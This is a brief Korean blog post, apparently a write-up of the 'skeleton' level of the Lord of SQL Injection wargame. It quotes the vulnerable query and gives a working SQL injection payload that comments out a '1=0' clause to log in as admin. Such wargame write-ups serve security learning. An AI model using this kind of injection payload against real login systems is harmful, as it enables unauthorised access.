Un_Woo
LOS skeleton 본문
10. skeleton
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
1=0 때문에 무조건 false
if($result['id'] == 'admin') solve("skeleton");
id=admin이어야 함
1=0을 #으로 주석 처리
?pw=%27%20or%20id=%27admin%27%23
'Web > Lord of Sql Ingection' 카테고리의 다른 글
| LOS darkknight (0) | 2018.04.11 |
|---|---|
| LOS golem (0) | 2018.04.11 |
| LOS vampire (0) | 2018.04.11 |
| LOS troll (0) | 2018.04.11 |
| LOS orge (0) | 2018.04.11 |
'Web/Lord of Sql Ingection' Related Articles
more
Comments